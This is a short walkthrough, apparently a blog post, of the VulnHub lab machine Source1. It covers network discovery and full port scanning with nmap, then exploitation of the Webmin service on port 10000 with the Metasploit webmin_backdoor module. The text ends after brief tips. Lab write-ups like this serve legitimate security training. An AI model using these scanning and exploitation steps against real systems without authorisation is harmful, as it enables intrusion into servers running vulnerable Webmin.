Vulnhub - Source1
Source1 is a boot2root virtual machine available on VulnHub, designed to test and enhance penetration testing skills. This walkthrough covers the steps to enumerate the machine, identify open ports, and exploit a WebMin web server vulnerability using Metasploit to gain root access. Follow along to learn key techniques for ethical hacking and privilege escalation.
Hey there, Hope you are doing great.
Intro
First, we need to know the IP address of our target VM. Commands to use:
1
2
3
$ nmap -sn -vvv 192.168.1.0/24
or
$ sudo netdiscover
The VM is running on 192.168.1.79 in my machine.
Now, let’s scan the ports of the target machine.
nmap -sC -sV -p- -T4 192.168.1.74 -oN results.log
Nmap flags usage
1
2
3
4
5
-sC : For default script scan.
-sV : For version scanning.
-p- : Full port scan (i.e 0-65536).
-T4 : Scan Speed.
-oN : Save the results in a file.
Nmap Result
So, it seems like there’s only 2 ports running on our vulnerable machine (i.e 22 and 10000). A WebMin web server is running on port 10000 as seen in the nmap result.
Commands to search for the exploit and use it.
1
2
3
$ msfconsole
$ search WebMin
$ use exploit/linux/http/webmin_backdoor
Exploitation
Things to remember
- Set the ssl to true while exploiting using msfconsole.
- To make things easy, add “
source" in /etc/hosts.